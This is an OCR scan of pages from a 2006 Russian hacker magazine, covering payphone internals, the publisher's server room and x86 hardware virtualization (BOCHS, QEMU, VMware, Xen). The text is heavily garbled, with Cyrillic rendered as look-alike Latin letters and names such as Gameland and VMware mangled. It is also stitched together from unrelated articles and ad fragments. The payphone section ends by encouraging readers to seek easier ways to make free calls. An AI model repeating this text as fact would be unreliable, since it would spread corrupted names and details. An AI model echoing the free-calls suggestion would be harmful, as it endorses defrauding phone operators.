С ДИНАМИКОМ 

Звучит при ошибке или в 
будущем будет звонить 



3. МОНЕТОПРИЕМНИК 

Г лотает монеты и определяет 
их номинал 



5. МЕХАНИЗМ 
ВОЗВРАТА МОНЕТ 

По этой горке монеты попада- 
ют юзеру обратно 



вывод 



К сожалению, в рамках одной статьи я не могу 
рассказать обо всех тонкостях устройства 
таксофона, тема достаточно обширная 
и будоражит умы многих хакеров во всем 
мире. По мере возможности я постараюсь 
освещать ее в своем у-сообществе (ги_гасІіо_ 
еіесіг), а также делиться информацией по 
мылу. Одно могу сказать точно: фрикерство 
в виде изготовления эмуляторов умерло. Как 
утверждают в МГТС, последний эмулятор был 
зафиксирован 3 года назад. Криптографию 
не победить одним маленьким контроллером. 
Для этого нужно быть просто гением. Конеч- 
но, нет ничего невозможного, но для неопыт- 
ных людей это будет непосильная задача, а 
профессионалам это просто неинтересно. 

Я рекомендую оставить идею изготовления 
эмулятора таксофонных карт и искать более 
простые способы бесплатных звонков. □: 



к Ч 

6. НАКЛЕЙКА 
ОПИСАНИЯ 

Описание расположения и 
назначения внутренностей 
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ЫЕѴѴ ЕѴЕРУйАУ ШХІІРУ* 

* РОСКОШЬ НА КАЖДЫЙ ДЕНЬ 




реклама товар сертифицирован 
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ЦИФРЫ И ФАКТЫ О НАШЕЙ КОМПЬЮТЕРНОЙ СИСТЕМЕ 



РАД ПРЕДСТАВИТЬ ТЕБЕ НОВУЮ РУБРИКУ. ОНА СДЕЛАНА СПЕЦИАЛЬНО ДЛЯ ТЕХ, КТО НЕ НА ШУТКУ ВОЗБУЖДАЕТСЯ 
ПРИ МЫСЛИ ОБ ОГРОМНЫХ ДАТАЦЕНТРАХ С СОТНЯМИ СЕРВЕРОВ, ДИЗЕЛЬНЫМИ СТАНЦИЯМИ РЕЗЕРВНОГО ПИТАНИЯ, 
ТЕРАБАЙТАМИ ХРАНИМЫХ ДАННЫХ, ТЫСЯЧАМИ ОБСЛУЖИВАЕМЫХ КЛИЕНТОВ И ДЕСЯТКАМИ КИЛОМЕТРОВ ПРОВОДОВ. 
КАЖДЫЙ МЕСЯЦ МЫ БУДЕМ НАВЕЩАТЬ ОДНУ ИЗ КРУПНЫХ ІТ-КОМПАНИЙ И СОСТАВЛЯТЬ ДЛЯ ТЕБЯ ПОДРОБНЫЙ ОТЧЕТ 
О ТОМ. КАКУСТРОЕНА И РАБОТАЕТ ИХ КОМПЬЮТЕРНАЯ СИСТЕМА. СТАРТОВАТЬ БЫЛО РЕШЕНО С НАШЕЙ СОБСТВЕННОЙ 



СЕРВЕРНОЙ - С МЕСТА, ГДЕ КУЕТСЯ ТВС 

ачинать рассказ о любом да- 
тацентре нужно с описания 
задач, которые перед ним ста- 
вились при создании. В случае 
компании ОатеІапсІ, процесс протекал 
эволюционно. В 96 году, когда компания 
только появилась насвет, никакой сервер- 
ной и в помине не было: возможно, было 
несколько компьютеров, но об отдельном 
помещении площадью 30 квадратных мет- 
ров тогда разговор точно не шел. В опре- 
деленный момент, с появлением первых 
журналов («Страна игр», «Хакер»), воз- 
никла большая потребность в файл-сер- 
вере для обеспечения совместного до- 
ступа к файлам верстки и была собрана 

/034 



1 ЛЮБИМЫЙЖУРНАЛ. 

производительная машинка для хранения 
данных. Со временем число журналов 
росло, появилась необходимость в под- 
держке разнообразных сетевых сервисов 
(базы данных, ѵѵеЬ-сервисы, почта, Кр и т. 
д.) и все эти потребности в конечном сче- 
те привели к тому, что мы имеем сейчас: 
к производительной серверной, которая 
каждый день обслуживает сотни работни- 
ков компании и несчетное число внешних 
пользователей. 

Каждый день серверы компании принима- 
ют десятки тысяч писем, отдают гигабайты 
трафика, а выделяемого ими за сутки теп- 
ла хватит, чтобы вскипятить почти полторы 
тонны воды. 



О Собственно, задачи 

Исторически так сложилось, что в компа- 
нии работает большое число «приходящих» 
людей, которые не сидят в офисе каждый 
день, а заезжают по мере необходимости. 
Естественно, выделить для каждого из них 
отдельный компьютер было невозможно 

— очень дорого и глупо. Но вместе с этим 
каждому человеку хотелось иметь «собс- 
твенный компьютер» со своими файлами, 
настройками и закладками в браузере. 
Эту проблему решили очень просто: орга- 
низовали доменную систему с хранением 
пользовательских профилей на сервере 

— контроллере домена. Теперь все рабо- 
чие станции в сети стали представлять со- 
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ОБЩАЯ ИНФОРМАЦИЯ 

Месторасположение: г. Москва, уя. Тимура 
Фрунзе, д. 1 1 , стр. 44-45, этаж 4. Офис ком- 
пании ОатеІапсІ. 

Выполняемые функции: 

• хранение больших объемов данных, об- 
щий доступ к ним для сотни пользователей; 

• организация доступа в интернет для кли- 
ентских машин в офисе; 

• хранение структурированной информа- 
ции на серверах БД, организация доступа 
к ним из внутрикорпоративных программ 
и ѵѵеЬ-приложений; 

• поддержка нескольких ѵѵеЬ-сайтов компа- 
нии и корпоративного іпігапеі-ресурса; 

• поддержка почтовых серверов для вне- 
шнего доступа (8МТР + РОРЗ/ІМАР); 

• поддержка внутренней почты на базе 
МісгозоЙ ЕхсИапде Зегѵег; 

• поддержка работы домена с хранимыми на 
контроллере пользовательскими профиля- 
ми; 

• поддержка нескольких Йр-серверов для 
обмена файлами с удаленными работника- 
ми и рекламными клиентами 

Размеры помещения: 10 метров в ширину, 
3 в длину 

Овщее энергопотревление: 16 кВт 
Суммарное тепловыделение: 8 кВт 
Вес оворудования: около 750 кг 
Овщий овъем хранимых данных: 2 терабайта 
Вентиляция: мощные вентиляторы, воздух 



ря, немного — что взять с этих геймеров. 
К счастью, в телефонной записной книж- 
ке у меня уже был номер нашего админа 
Дениса (буквально за день до этого я зво- 
нил ему по другому вопросу, связанному 
с работой своего аккаунта). Несмотря 
на поздний час, Денис ответил на звонок 
бодрым голосом и попросил посмотреть, 
что там твориться на сервере. Для этого 
у входа в серверную установлен монитор, 
подключенный к специальному переклю- 
чателю. С его помощью можно без труда 
получить доступ к консоли требуемого 
сервера. Как только я переключился 
на нужный сервак, стало ясно: он висит. 
Что тут можно сделать? Естественно, пе- 
резагрузить. Вскоре в руках у меня оказа- 
лись ключи от серверной, которые отдал 
охранник, и я под руководством Дениса 
стал искать сервер. Надо сказать, удо- 
вольствия в этом было мало: в серверной 
было невероятно жарко, к тому же стоял та- 
кой дикий гул, что мне приходилось выходить 
из комнаты, чтобы услышать собеседни- 
ка. Первый блин, по обыкновению, вышел 
комом и даже после перезагрузки сервак 
работать отказался, сославшись на неис- 
правный 8081-винт. Было решено дать ему 
немного отдохнуть, и уже через 10 минут 
к великой радости всех сотрудников он 
все-таки завелся». 



Четвертое июля 2006 года, два часа ночи. 
В душном и пыльном офисе в такое время 
летом сидяттолько отмороженные неудач- 
ники — люди, которым в ближайшее время 
надо сдавать результат своей месячной 
работы. Они весь месяц раздолбайни- 
чали и за неделю до сдачи решили-таки 
поработать. 

Наш редактор диска Степан, конечно, не из 
числатаких ребят. Он все делает вовремя, 
но в этот раз обстоятельства сложились 
не в его пользу, и пришлось задержаться 
на работе. 

Степан сидел и, ничего не подозревая, 
лазал по интернету в поисках для тебя 
лучшего софта. А в это время в 60 мет- 
рах от него в нашей серверной начала 
разрастаться техногенная катастрофа. 
Ее результаты Степ ощутил уже через 
минуту. Вот, что он вспоминает: 

«Сначала вырубился интернет, исчез до- 
ступ к сетевым дискам, и в конце концов 
вылетело виндовое окошко с предложени- 
ем залогиниться. Сомнений не оставалось 
— контроллер домена упал. Минут через 
15 стало ясно, что сам по себе сервак не 
поднимется и ситуацию пора брать под 
свой контроль. Кто же еще поможет вос- 
становить сеть, если не сотрудник «Хаке- 
ра»:)? Надежды на то, что этим займутся 
ребята из «Страны игр» было, мягко гово- 



БАЙКА ОТ 5ТЕР 



РЕЗЕРВНОЕ ПИТАНИЕ 

Как устроена: (УР5 на аккумуляторах 
Время автономной работы: 20 минут 
Мощность: 14 кВт 

Занимаемая системой площадь: 1 кв. м 

Частота сбоев питания: бываети по нескольку раз в неделю— офис компании 
питается от сети Мосэнерго, причем здание не приоритетно в энергоснабже- 
нии (бывший завод) 



КОНФИГУРАЦИЯ СЕРВЕРОВ 

Процессор: 2 штуки Хеоп 3,2 ГГц 
Объем памяти: 2 Гб 

Жесткий диск: 60-300 Гб (в зависимос- 
ти от задачи сервера), 5СЗІ, либо КАЮ 
Видео карта: монохромная, 16-строч- 
ная, двухбитная 

Сетевые интерфейсы: ОідаЫІЕІГіегпеі 
Размеры: 1(Іи2іІг 



СЕТЕВЫЕ СОЕДИНЕНИЯ 

Внутренняя сеть: 1000ВА8Е-Т 
Внутренний трафик: около 750 Гб/месяц 
Внешний трафик: 70 Гб/месяц 
1 Количество интернет-каналов: 1, резерв- 
ныхнет 

Поставщики интернета: «Рм-Телеком» 

Тип интернет-канала: оптоволокно 
Время пиковой загрузки: 16:00 
Величина пиковой загрузки: 15 Мбит/сек 



забирается из офиса 
Охлаждение: 2 кондиционера по 1,5 кВт 
Максимальная температура внутри: 46 гра- 
дусов — в июле кондиционеры еще не были 
установлены, именно об этом времени тебе 
расскажет Степ в своей байке 
Сеть в офисе: около 30 км проводов, стан- 
дарт СідаЬіі ЕіИегпеі, плюс 12 ѴѴіРі-точек, 
развешанных по офису 
Васкир-система: гордость промышленнос- 
ти — роботизированная библиотека на базе 
ленточного стримера; данные пишутся на 
магнитную ленту, смена и доступ к бобинам 
осуществляется автоматически 
Овъем ежедневного Еэкапа: 100-200 Гб 
Охрана серверной: врезной замок, ключ у 
охранника 

Максимальный Іір^іте сервера: 6 месяцев 
Средний Іір-Мте: 2 месяца 
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«Стратегическая задача любой большой корпорации — обеспечение собс- 
твенной безопасности, то есть устойчивости к возможным неприятностям» 



бой «терминалы», для работы на которых 
нужно было зайти в домен, конечно, при 
помощи выданного администратором имени 
и пароля. После подключения к домену 
терминал загружает пользовательский 
профиль и все настройки применяются 
к системе. Пользователь может залоги- 
ниться на любом компьютере, и везде 
с ним будут его настройки, закладки и 
«Мои документы». 

С появлением рекламы в журналах возникла 
потребность в передаче рекламных маке- 
тов от клиентов в редакцию. Возить диски 
с курьером долго и неудобно. Проблему 
решили организацией быстрого Йр-сервера, 
куда дизайнеры заливают рекламные маке- 
ты. Передать файл весом 1 00 Мб — не про- 
блема, сейчас в любой организации очень 
быстрый интернет с бесплатным трафи- 
ком. Эти же серверы используются для вза- 
имодействия с удаленными работниками. 
Так, например, на этот сервер закачивает 
видеоролики Сашикс — редактор видео, 
который живет наУкраине. 
Почтисразупослевыходапервыхжурналов 
было принято решение, что они будутпеча- 
таться в Финлян дии, в типографии ЗсапѵѵеЬ. 
Надо отметить, это очень технологичная 
контора и она предоставляет своим кли- 



ентам возможность загружать файлы для 
печати через защищенный Іір-интерфейс. 
Для нашей компании это означало, что 
жизненно необходим производительный 
и надежный интернет-канал. В результате 
в новом офисе был организован оптичес- 
кий кабель, который с легкостью справля- 
ется с огромным потоком данных. 

Наша компания очень быстро столкну- 
лась с необходимостью использования 
сервиса ІР-телефонии: нужно принимать 
большое число звонков снаружи на единс- 
твенный редакционный номер, позволить 
звонящим интерактивно переключаться 
на внутреннего абонента и организовать 
связь внутри офиса. Все эти задачи были 
решены «на отлично» покупкой и установ- 
кой соответствующего оборудования не- 
безызвестной фирмы СІ8СО. 
Стратегическая задача любой большой 
корпорации — обеспечение собственной 
безопасности, то есть устойчивости к воз- 
можным неприятностям. Чтобы не было 
таких форс-мажорных обстоятельств, ко- 
торые могли бы погубить бизнес, напри- 
мер, чтобы исключить возможность кра- 
жи оборудования и вещей, организуется 
круглосуточная охрана офиса и пропус- 
кной режим. Для защиты от пожара — по- 



жарная сигнализация и система тушения. 
От действий сумасшедших сотрудников 
— система отбора персонала и психологи- 
ческие собеседования. В случае защиты 
информации все еще важнее: информа- 
ция — это самое главное и самое дорогое. 
Поэтому при создании серверной особен- 
ное внимание у нас было уделено системе 
резервного копирования. Объем хранимых 
данных достаточно велик — около двух 
терабайт. Это профили пользователей, 
письма, файлы верстки, поддерживаемые 
сайты, архивы журналов, текущие файлы. 
Все это однажды было записано на маг- 
нитные ленты, и ежедневно дописываются 
изменения — примерно 100-200 Гб. Каж- 
дую неделю эти бесценные ленты отправ- 
ляются в безопасное место и хранятся там 
с пометкой «бессрочно». Это жизненно 
важные чекпоинты, по которым, что бы ни 
случилось, можно восстановить состояние 
дел неопределенный момент времени. 
Насамом деле, в общем-то, это все, что я хо- 
тел тебе рассказать о нашей серверной. 
Хочу еще отдельно отметить, что на нашем 
диске ты найдешь видео, в котором нагляд- 
но показано, что собой представляет наша 
компьютерная система. Советую посмот- 
реть — интересно. 
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как никто 



дизайна, мощно ститтпер е д о в ы х технологии 
Нгеіи в ми^^ш ^Й^ ілишѵшим приводом Віи Нау, оснащенный широко* 
ркранным диспшемвысокого разрешения 1920x1200, двухъядерным 
процессором и выходом НОМІ. 



Мультимедийный ноутбук серии АН - это нечто большее, чем просто 



мощный мобильный ноутбук. 
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ИНТЕРЕС К РАЗЛИЧНОГО РОДА ЭМУЛЯЦИЯМ ВСЕ РАСТЕТ И РАСТЕТ. КОМУ НЕ ИНТЕРЕСНО ЗАПУСТИТЬ ИЗ-ПОД ѴѴІІХЮ0ѴѴ5 ЭТОТ 
ЗАГАДОЧН БІЙІЛЧІІХИЛ И ПОЛЮБОВАТЬСЯ МАС05Х7ЕДИНСТВЕННЫЙСДЕРЖИВАЮЩИЙФАКТ0Р-ЭТ0НИКУДЫШНАЯ ПРОИЗВО- 
ДИТЕЛЬНОСТЬ ЭМУЛЯТОРОВ, КОТОРЫЕ ПО ОБЫКНОВЕНИЮ БОЛ ЬШЕТОРМОЗЯТ, ЧЕМ РАБОТАЮТ. НО ВОТ В СЕРЕДИНЕ 2006 ГОДА 
В ПРОЦЕССОРАХ ІІЧТЕЬ И АМО НАКОНЕЦ-ТО ПОЯВИЛАСЬ АППАРАТНАЯ ПОДДЕРЖКА ВИРТУАЛИЗАЦИИ, КОТОРАЯ СНИЖАЕТ 
НАКЛАДНЫЕ РАСХОДЫ НА ЭМУЛЯЦИЮ В СОТНИ РАЗ. ТУТ УЖЕ САМ БОГ ВЕЛЕЛ РАЗОБРАТЬСЯ, ЧТО К ЧЕМУ И НАСКОЛЬКО ХОРОШО 
РАБОТАЕТ. 



ет 15-20 назад, в эпоху перехода 
с 8-битного потребительского 
барахлатипа РК86, 2ХЗресігит 
на серьезный по тем временам 
ІВМ РС ХТ/АТ, ностальгирующие разработ- 
чики, нежелающие расставаться со старой 
техникой, писали эмуляторы. Растущие как 
грибы после дождя, эмуляторы позволяли 
всем желающим играть в их любимые игры, 
прямых аналогов которых на ІВМ РС не су- 
ществовало. Через 10 лет история повтори- 
лась. Операционные системы семейства І\ІТ, 
ставшие стандартом де-факто, заблокиро- 
вали прямой доступ к оборудованию, и 90% 
игр тут же отказалось запускаться (или по- 
теряло звуковое сопровождение). «Ответом 
турецкому султану» стали ЭОЗВох и другие 
эмуляторы, позволяющие повернуть время 
вспять и вспомнить свою былую молодость, 
прошедшую в окровавленных коридорах 
ЭООМ II. Только вот даже на Р-ІІІ 733 старый 
добрый АІабсІіп шел на пределе, с пропуском 
кадров, не говоря уже про более серьезные 
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игры. Наращивать мощность было невы- 
годно. Проще купить старый компьютер, 
водрузить на него МЗ-ЭОЗ и наслаждаться 
играми без внезапных вылетов эмулятора, 
рывков и тормозов. 

Идея эмулировать ІВМ РС на самом ІВМ РС, 
то есть создавать виртуальные машины, 
родилась не сразу, но тут же завоевала 
расположение хакеров, системных адми- 
нистраторов и просто любопытствующих. 
Всплывающий ЗоШСЕ уже не замораживал 
компьютер, позволяя отлаживать програм- 
му с одновременным чтением документации. 
Для экспериментов с вирусами уже не при- 
ходилось переключаться на специальный 
жесткий диск. И самое главное — любойже- 
лающиймогпоставитьиШХ/ВЗЭ, не рискуя 
угробить основной ѴѴіпбоѵѵз-раздел. Ценная 
вещь, не поспоришь! 

К сожалению, для полноценной работы с 
ЫШХ'ом на эмуляторе требовалась очень 
мощная машина с резвым процессором и 
большим объемом оперативки. По-насто- 



ящему комфортно можно было ковырять- 
ся в консоли, в то время как в красивых 
КЭЕ/ОІЧОМЕ приходилось полностью от- 
ключать все визуальные эффекты. Ты бы, 
возможно, и дал ьше продолжал тратить вре- 
мя и переживать из-за непрерывных тормо- 
зов, если бы неузнал сегодня обаппаратной 
виртуализации. Это настоящий прорыв со 
стороны процессоров, позволяющий гонять 
гостевые операционные системы с той же 
скоростью, с какой они исполнялись бы на 
«живом» железе! Круто? Еще бы, но не бу- 
дем забегать вперед. 

□ От динозавров 
машинной эры до нашихдней 

Вследза возникновением концепции много- 
задачности появилась идея виртуализации. 
Чтобы запускать несколько операционных 
систем одновременно, процессор должен 
поддерживать виртуальную память и обла- 
дать раздельными уровнями привилегий, 
согласованными с набором команд. Специ- 
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«К СОЖАЛЕНИЮ, ДЛЯ ПОЛНОЦЕННОЙ 
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С РЕЗВЫМ ПРОЦЕССОРОМ И БОЛЬШИМ 
ОБЪЕМОМ ОПЕРАТИВКИ» 



альная программа — Монитор Виртуальных 
Машин (ѴігіиаІ МасМпе Мопііог, или ѴММ) 
— запускалась бы на наивысшем уровне 
привилегий, перехватывала выполнение 
привилегированных инструкций (пытающих- 
ся обратиться к физической памяти или 
портам ввода-вывода, например) и эмули- 
ровала их выполнение. Непривилегирован- 
ные инструкции в этой схеме выполняются 
на «живом» железе без потери скорости. 
А поскольку процент привилегированных 
инструкций относительно невелик, наклад- 
ными расходами на эмуляцию можно полно- 
стью пренебречь. Это, можно сказать, иде- 
альная схема. 

Из всех существующих на тот момент ма- 
шин данным критериям отвечали только 
ІВМ Зузіет/370 и Моіогоіа МС68020, на ко- 
торых и были реализованы эффективные 
эмуляторы, позволяющие, в частности, 
создавать виртуальные серверы, обслужи- 
вающие разных пользователей или просто 
дублирующие друг друга. Если падает один 
сервер, инициативу тут же подхватывает 
другой, и для этого совершенно не нужно 
держать несколько физических серверов! 
Конечно же, выход из строя самого серве- 
ра здесь не рассматривается, поскольку 
операционные системы наворачиваются 
значительно чаще. 

А как же процессоры семейства ІпіеІ 80386? 
Они поддерживают виртуальную память и 
разделение привилегий по целым четырем 
кольцам защиты. Что мешает реализовать 
на них полноценный эмулятор, такой же, 
как и на ІВМ Зузіет/370?! Начнем с того, что 
все операционные системы, какие только 
имеются на ІВМ РС, помещают свои ядра 
в так называемое нулевое кольцо, на кото- 
рое понятие привилегированных команд не 



распространяется. Следовательно, Мони- 
тор Виртуальных Машин уже не может их 
перехватывать. Беда! Правда, существу- 
ет лазейка — устанавливаем некоторую 
операционную систему, объявляя ее базо- 
вой или основной (бозі), и запускаем все 
остальные оси... в третьем кольце! Тогда 
привилегированные инструкции станут 
возбуждать исключения, легко перехваты- 
ваемые Монитором Виртуальных Машин, 
работающим в нулевом кольце. Но тут не 
все так легко, как кажется! Во время рабо- 
ты процессор тесно связан с так называе- 
мыми таблицами дескрипторов, в которых 
содержится информация о сегментах па- 
мяти и прерываниях. Проблема в том, что 
они существуют в единственном числе и 
для работы процессора в нескольких ОС 
совершенно не приспособлены. Сущест- 
вует один выход — для каждой из виртуаль- 
ных машин создавать свою собственную 
копию таблиц дескрипторов, переключая 
их при переходе с одной виртуальной ма- 
шины на другую. Это очень тормозит про- 
цесс, но даже на этом проблемы не закан- 
чиваются. Любопытные могут прочитать 
некоторые тонкости во врезке, всем же ос- 
тальным рекомендую просто читать далее. 



О Программная эмуляция 

Непригодность х86-архитектуры для эф- 
фективной виртуализации еще не запре- 
щает эмулировать ІВМ РС программно с 
минимальной поддержкой со стороны обо- 
рудования. В грубом приближении это будет 
интерпретатор, «переваривающий» машин- 
ные команды с последующей имитацией их 
выполнения. С 8086 никаких проблем не 
возникает, но вот эмуляция страничной ор- 
ганизации памяти и прочих штучек 386+ не 
только усложняет кодирование, но и снижа- 
етскорость выполнения программы в сотни 
или даже в тысячи раз! 

Одним из таких эмуляторов и является зна- 
менитый ВОСНЗ, создающий виртуальный 
компьютер с полным комплектом «оборудо- 
вания» на борту и способный эмулировать 
двухпроцессорную (или даже четырехпро- 
цессорную!) машину даже при наличии 
всего одного физического процессора. 
Кроме того, это единственный эмулятор, 
поддерживающий архитектуру х86-64, ра- 
ботающую поверх х86! 

Полные исходные тексты можно бесплатно 
скачать с ИДр://ЬосИз.зоигсеІогае.пе1 . там же 
лежат и готовые бинарные сборки для 
ѴѴіпсІоѵѵз и І_ІІ\ІІ)Х. К сожалению, чтобы запус- 
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> Еще один добротный эмулятор — РагаІІеІз 



> АІасІсІіп, запущенный под эмулятором ООЗВох 



тить на ВОСНЗ'е ѴѴіпсІоѵѵз 2000, потребуется 
очень мощный процессор, самый мощный, 
который только можно купить. Но и в этом 
случае все будет очень сильно тормозить. 

На основе ВОСНЗ'а был создан другой за- 
мечательный эмулятор — ОЕМІ), исполь- 
зующий режим динамической эмуляции, 
которая увеличивает производительность в 
десятки раз. Не вдаваясьвтехническиепод- 
робности, достаточно отметить, что ОЕМІ) 
как бы компилирует машинный код, и при 
повторном выполнении он исполняется на 
«живом» железе на полной скорости. В цик- 
лах это дает колоссальный выигрыш! 
Правда, общая производительность все 
равно оставляет желать лучшего, да и ста- 
бильность (в силу технических сложнос- 
тей реализации динамической эмуляции) 
прихрамывает. Некоторые программы 
(особенно игрушки) вообще не запуска- 
ются, некоторые периодически вылета- 
ют. Однако ОЕМІІ легко тянет иЫІІХ/ВЗЭ 
без графической оболочки, и ряды его 
поклонников неуклонно растут. Свежую 
версию всегда можно бесплатно скачать с 
НПрѴ/іаЬгісе.ЬеІІагб.ігее.іг/дети . 

□ Если нельзя, но очень хочется, то можно 

Осознав, какие рыночные перспективы от- 
крывает создание качественного эмулятора, 



8 февраля 1 999 года компания ѴМ ѴѴаге пред- 
ставила революционный продукт ѴМ ѴѴаге 
ѴігіиаІ РІаЙогт. Для достижения эффектив- 
ной скорости эмуляции на х86 разработчики 
ѴМ ѴѴаге использовали ряд хитрых трюков, 
требующих тесного взаимодействия с ядром 
основной оси и, что хуже всего, наклады- 
вающих довольно жесткие ограничения на 
гостей. Полной виртуализации добиться так 
и не удалось. Реально имитируется лишь от- 
носительно небольшая часть возможностей 
х86, а остальные приводят к аварийному за- 
вершению гостевой оси или работают не так, 
как предполагалась. Но зато производитель- 
ность сокращается уже не в сотни, а всего 
лишь в десятки раз, обеспечивая комфорт- 
ную работу с ѴѴіпсІоѵѵз 2000 уже на Репііит-ІІІ. 
Однако поиграть в игрушки или посмотреть 
видеофильм, увы, не получится. 
Аналогичную схему виртуализации исполь- 
зует и ѴігіиаІ РС, явно уступающий своему 
конкуренту в полноте эмуляции. В частнос- 
ти, отладчик ЗоТИСЕ, великолепно работа- 
ющий под ѴМ ѴѴаге, на ѴИиаІ РС просто не 
идет. Тем не менее под ѴИиаІ РС лучше ра- 
ботают игрушки, не требующие быстрого 
процессора и мощной видеокарты, но там 
возникают серьезные проблемы со звуко- 
вой поддержкой. 

Оба продукта являются коммерческими и 



распространяются наплатнойоснове. Плюс 
еще встает довольно щекотливый вопрос о 
необходимости лицензирования ѴѴіпсІоѵѵз 
(и другого ПО) для каждой виртуальной ма- 
шины, на которой она установлена. С юри- 
дической точки зрения, все О'К, поскольку 
операционные системы до сих пор лицензи- 
руются под физические машины, что вполне 
логично. Но вот мерзкая защита, встроен- 
ная в ѴѴіпсІоѵѵз, требует активации при сме- 
не всех трех ключевых компонентов — про- 
цессора, жесткого диска и видеокарты, а 
на виртуальной машине они, естественно, 
виртуальные и совсем несовпадающие с 
реальными. Правда, ѴМ ѴѴаге, выполняющая 
команду СРІІЮ «в живую», показывает про- 
цессор таким, какой он есть, избавляя нас 
от необходимости платить за одну и туже 
копию ѴѴіпсІоѵѵз помногу раз подряд. 

О Неожиданное подкрепление или аппа- 
ратная виртуализация 

Пробиваясь на рынок мощных серверов, 
компании ІпіеІ и АІѴЮ разработали техно- 
логии аппаратной виртуализации. Грубо 
говоря, они добавили дополнительное 
кольцо защиты, работая в котором, гипер- 
визор может перехватывать все собы- 
тия, требующие внимания с его стороны. 
В практическом плане это означает, что 



ПАРА ПРИЧИН, ПОЧЕМУ ПЛАТФ0РМАХ86 НЕ ГОДИТСЯ ДЛЯ ЭФФЕКТИВНОЙ ЭМУЛЯЦИИ 



Инструкции 1_0ЮТ, І_І_ЭТ и І_ЮТ, загружающие во внутренние ре- 
гистры процессора указатели на глобальные/локальные табли- 
цы дескрипторов сегментов (специальные структуры данных, в 
которых содержится вся необходимая системная информация), 
одновременно с несколькими операционными системами ра- 
ботать не могут, поскольку существуют в единственном числе. 
С таблицей дескрипторов прерываний та же самая картина. При 
этом гостевая ось не может использовать «хозяйские» таблицы 
дескрипторов по той причине, что селекторы (то есть системные 
указатели) сегментных регистров жестко прописаны внутри са- 
мой оси. И если ѴѴіпсІоѵѵз грузит в регистр 08 селектор 23Н (а она 



действительно грузит его), становится непонятно, что делать 
всем остальным?! Но даже единственный выход из этого поло- 
жения — создание копии таблиц дескрипторов для каждой ОС и 
оперативное переключение между ними — не решает всех про- 
блем. И вот почему. Инструкции ЗСЮТУЗІ_ЭТ и ЗЮТ, считывающие 
значения внутренних регистров процессора, не являются приви- 
легированными, в результате чего гостевая ось читает таблицу 
дескрипторов основной оси вместо своей собственной! Это от- 
носится и к инструкции ЗМЗѴѴ, считывающей значение командно- 
гословапроцессора. В этозначение, вчастности, попадаютбиты 
из регистра СЯ0, который гостевая ось не должна видеть. 



/040 



ХАКЕР 1 1 /95/ 06 





рс_Еопе 




» 




>х86-64 версия ЭеЫап’а, запускаемая нах86-процес- 
соре под эмулятором ВОСНЗ 




> Моя любимая ѴѴіпсІоѵѵз 2000, запущенная под 
ѴМѵѵаге 



эмулятору теперь незачем извращаться, а 
производительность виртуальных машин 
стала достигать порядка 90% производи- 
тельности основного процессора. Это вы- 
глядит очень заманчиво и вызывает непре- 
одолимое желание заполучить эту штуку 
как можно скорее. 

Что же нам для этого понадобиться? 
В первую очередь правильный кремний. 
Аппаратную виртуализацию поддержи- 
вают следующие модели процессоров 
Іп!еІ: Репііит 46x2, Репііит Э 9хх, Хеоп 
7ххх, Соге Эио и Соге 2 Эио (технология 
ѴапсІегрооІ), а также І!апіит (технология 
Зііѵегѵаіе). Все процессоры фирмы 
АМЭ, вы пущенные после мая 2006 года 
на сокетах Воске! АМ2, Воске! 51 и Воске! Р 
(А!Ыоп 64, Тигіоп 64 и, начиная с августа 
2006, Ор!егоп), также поддерживаюттехно- 
логию аппаратной виртуализации с кодо- 
вым именем РасіЯса. Впрочем, официаль- 
но эти технологии именуются ѴТ-Х и АМЭ-Ѵ. 
Сложно назвать эти процессоры новыми, 
хотя и старыми их не назовешь. В любом 
случае теперьтызнаешь, какой процессор 
выбрать для грядущего апгрейда. 
Естественно, к процессору понадобится 
материнская плата и, скорее всего, обнов- 
ленная версия ВІОЗ. Отдельные ВЮЗ поз- 
воляют включать/выключать поддержку 



аппаратной виртуализации, и на некото- 
рых из них по умолчанию она почему-то 
выключена. 

□ Настоящий подарок — бесплатный ХЕЫ 

Теперь очередь ПО. Разработчики эмуля- 
торов активно включаются в игру, подтяги- 
вая свои штаны к новейшим достижениям 
прогресса, и так или иначе через неко- 
торое время все они будут использовать 
технологию аппаратной виртуализации. 
В стороне останутся только экзотические 
эмуляторы типа ВОСНВ'а, поскольку ника- 
кая аппаратная виртуализация не позво- 
лит эмулировать четырехпроцессорную 
машину на однопроцессорной, хотя это 
безусловно кому-то нужно. 

Поскольку желающих платить среди нас, 
как я понимаю, что-то не наблюдается, в 
первую очередь рассмотрим некоммер- 
ческие продукты, тем более что по своим 
функциональным возможностям они зна- 
чительно превосходят своих конкурентов. 
Итак, ХЕЫ — детище некоммерческой ор- 
ганизации Хеп Соттипі!у, возглавляемой 
Яном Праттом (Іап Рга!!) из ХепВоигсе Іпс. 
Он появился задолго до «изобретения» ап- 
паратной виртуализации и широко исполь- 
зовался компаниями ІВМ, НеѵѵІе!!-РаскагсІ 
в своих мэйнфреймах для организации 



выделенных виртуальных серверов (ѵіг!иаІ 
бесІіса!есІ зегѵегз). Это говорит о высокой 
надежности и качестве данного продукта, 
проверенного временем и, помимо х86, 
поддерживающего х86-64, ІА64, РРС и 
ВРАРС. 

Правда, на процессорах, не поддержи- 
вающих технологию аппаратной вирту- 
ализации, требуется модификация ядра 
гостевой операционной системы, взаимо- 
действующей с гипервизором посредс- 
твом предоставляемого им набора АРІ- 
функций. С открытыми операционными 
системами (хВВЭ, І_іпих) в этом плане ника- 
кихпроблем не возникает, а вот ѴѴіпсІоѵѵзХР 
удалось перенести на ХЕЫ исключитель- 
но в рамках проекта Місгозо!!'з Асасіетіс 
Ысепзіпд Ргодгат, позволяющего хачить 
ядро ѴѴіпсІоѵѵз в академических целях. Не- 
смотря на то, что перенос осуществлялся 
при активном участии МісгозоІ! РезеагсН в 
тесном сотрудничестве с группой 11піѵегзі!у 
о! СатЬгісІде Орега!іпд 5уз!ет, условия 
лицензионного соглашения не позволя- 
ют распространять порт ХР ни под каким 
соусом. Но технические детали переноса 
детально описаны в документации на ХЕЫ, 
и при жгучем желании, помноженном на 
избыток свободного времени, этот фокус 
в состоянии повторить любая хакерская 



Инструкции РОРР/РОРРЭ сохраняют содержимое регистра 
ЕР1_А05 в памяти без генерации исключения, и хотя попытка 
модификации привилегированных полей ЕРІ_А05 приводит к ис- 
ключению, это не спасает ситуацию. Допустим, гостевая ось за- 
носит в ЕРІ_А05 значение X, затрагивающее одно или несколько 
привилегированных полей. Процессор генерирует исключение, 
эмул ятор перехваты ваетего и и митируетзапись, подсовывая гос- 
тевой системе «виртуальный» ЕРІ_А05. Однако чтение ЕРІ_АОЗ, 
не являясь привилегированной инструкцией, возвращает его 
немодифицированное содержимое, и вместо ожидаемого X ось 
видитУ. 



